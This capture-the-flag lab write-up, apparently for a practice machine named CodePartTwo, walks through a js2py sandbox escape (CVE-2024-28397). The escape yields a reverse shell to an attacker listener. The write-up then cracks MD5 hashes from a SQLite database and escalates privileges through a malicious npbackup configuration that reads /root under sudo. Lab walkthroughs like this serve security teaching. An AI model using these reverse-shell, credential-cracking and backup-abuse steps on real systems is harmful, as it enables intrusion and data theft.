CodePartTwo¶

Discovered Ports¶

22/tcp   Open  SSH
8000/tcp Open  HTTP (Python app)

Enumeration¶

Port 8000 hosts a Python-based web application. By interacting with the form, we discover a Python sandbox that allows code execution. However, it is actually running a JavaScript interpreter via js2py.

Exploitation: CVE-2024-28397 – js2py Sandbox Escape¶

The sandbox is vulnerable to CVE-2024-28397, a sandbox escape vulnerability that allows arbitrary code execution on the server.

PoC references:

Exploit¶

# On attacker machine
nc -nlvp 4444

# On attacker machine: launch exploit
cd /home/h0lm/Tools/js2py-Sandbox-Escape-CVE-2024-28397-RCE
bash exploit.sh

# Parameters entered
Target URL: http://10.10.11.82:8000/run_code
Your IP: 10.10.14.36
Your Port: 4444

Result: reverse shell as user app.

Initial Access – user `app`¶

While exploring /home/app/app/instance/users.db, we find a SQLite database containing user accounts and password hashes:

strings instance/users.db

Interesting extract:

CREATE TABLE user (
    id INTEGER NOT NULL,
    username VARCHAR(80) NOT NULL,
    password_hash VARCHAR(128) NOT NULL,
    PRIMARY KEY (id),
    UNIQUE (username)
)
marco
97588c0e2fa3a024876339e27aeb42e
649c9d65a206a75f5abe509fe128bce5

Hash Cracking¶

Using CrackStation:

Hash	Type	Result
649c9d65a206a75f5abe509fe128bce5	MD5	sweetangelbabylove
97588c0e2fa3a024876339e27aeb42e	Unknown	Not found

Recovered credentials:

marco : sweetangelbabylove

SSH Access¶

ssh marco@10.10.11.82

Finding first flag, user.txt.

Privilege Escalation – npbackup¶

User marco belongs to the npbackup group, which grants access to the backup tool /usr/local/bin/npbackup-cli.

The idea is to create a malicious configuration file to back up /root into a locally accessible repository.

Create a Restic Repository¶

restic init --repo /tmp/exploit-repo

Malicious Configuration `/tmp/npbackup2.conf`¶

conf_version: 3.0.1
audience: public

repos:
  default:
    repo_uri: "local:///tmp/exploit-repo2"
    repo_group: default_group
    backup_opts:
      source_type: folder_list
      paths:
        - /root
      post_exec_commands:
        - "chmod -R 0777 /tmp/exploit-repo2"
      post_exec_per_command_timeout: 60
      post_exec_failure_is_fatal: false
    repo_opts:
      repo_password: "test"
    is_protected: false

groups:
  default_group:
    backup_opts:
      compression: auto
      use_fs_snapshot: true
      one_file_system: false
    repo_opts:
      retention_policy: {}
    is_protected: false

identity:
  machine_id: ${HOSTNAME}__blw0
  machine_group:

global_options:
  auto_upgrade: false

Run the Backup with sudo¶

sudo /usr/local/bin/npbackup-cli -b -c /tmp/npbackup2.conf

The /root directory is backed up into /tmp/exploit-repo2 with permissive permissions.

Reading the Backup Contents¶

restic -r /tmp/exploit-repo2 ls latest /root
mkdir -p /tmp/exploit-mnt
restic -r /tmp/exploit-repo2 mount /tmp/exploit-mnt

From /tmp/exploit-mnt, we can access /root files, including the root flag.

Summary¶

Step	Description
Enumeration	Discovered vulnerable JS sandbox
Initial Exploit	CVE-2024-28397 → reverse shell as `app`
Credential Harvesting	Recovered MD5 hash → SSH as `marco`
Privilege Escalation	Abused npbackup + restic to read `/root`
Flags	`user.txt` / `root.txt`

Resources¶

CVE-2024-28397 PoC
Restic Documentation
npbackup-cli (tool used for privilege escalation)